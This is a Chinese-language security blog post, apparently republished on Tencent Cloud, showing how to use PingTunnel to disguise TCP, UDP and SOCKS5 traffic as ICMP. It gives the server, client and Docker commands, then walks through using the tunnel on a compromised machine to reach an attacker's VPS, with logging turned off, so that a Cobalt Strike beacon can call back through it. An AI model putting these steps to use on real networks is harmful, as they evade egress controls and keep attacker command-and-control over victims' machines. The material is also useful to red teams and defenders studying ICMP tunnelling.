利用PingTunnel上线cobalt strike
利用PingTunnel上线cobalt strike
Khan安全团队
发布于 2021-11-05 10:36:21
发布于 2021-11-05 10:36:21
pingtunnel 是tcp/udp/sock5 流量伪装成icmp流量进行转发的工具。
安装服务端
- 首先准备好一个具有公网 ip 的服务器,假定域名或者公网 ip 是www.yourserver.com
- 从releases下载对应的安装包,如 pingtunnel_linux64.zip,然后解压,以root权限执行
sudo wget (最新release的下载链接)
sudo unzip pingtunnel_linux64.zip
sudo ./pingtunnel -type server- (可选)关闭系统默认的 ping
echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all安装客户端
- 从releases下载对应的安装包,如 pingtunnel_windows64.zip,解压
- 然后用管理员权限运行,不同的转发功能所对应的命令如下
- 如果看到有 ping pong 的 log,说明连接正常
转发 sock5
pingtunnel.exe -type client -l :4455 -s www.yourserver.com -sock5 1转发 tcp
pingtunnel.exe -type client -l :4455 -s www.yourserver.com -t www.yourserver.com:4455 -tcp 1转发 udp
pingtunnel.exe -type client -l :4455 -s www.yourserver.com -t www.yourserver.com:4455
Docker
也可直接用docker启动,更方便。参数同上
- server:
docker run --name pingtunnel-server -d --privileged --network host --restart=always esrrhs/pingtunnel ./pingtunnel -type server -key 123456- client:
docker run --name pingtunnel-client -d --restart=always -p 1080:1080 esrrhs/pingtunnel ./pingtunnel -type c
PingTunnel跟cobalt strike一起用
这个实验主要想说明端口转发,假设场景拿下一台机器icmp出网 只有1234端口出网。
第一步在自己公网vps设置监听
在拿下客户机运行如下命令本地8001端口转发到公vps上1234端口
pingtunnel.exe -type client -l :8001 -s192.168.254.133 -t 192.168.254.133:1234 -tcp 1 - noprint 1 -nolog 1
在公网vps设置两个监听器一个是127.0.0.1 8001 一个是 公网vps 1234
可以看到CS上反弹回来
监听器127.0.0.1生成beacon运行在被攻击机上
192.168.254.133模拟的是公网vps
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-11-01,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号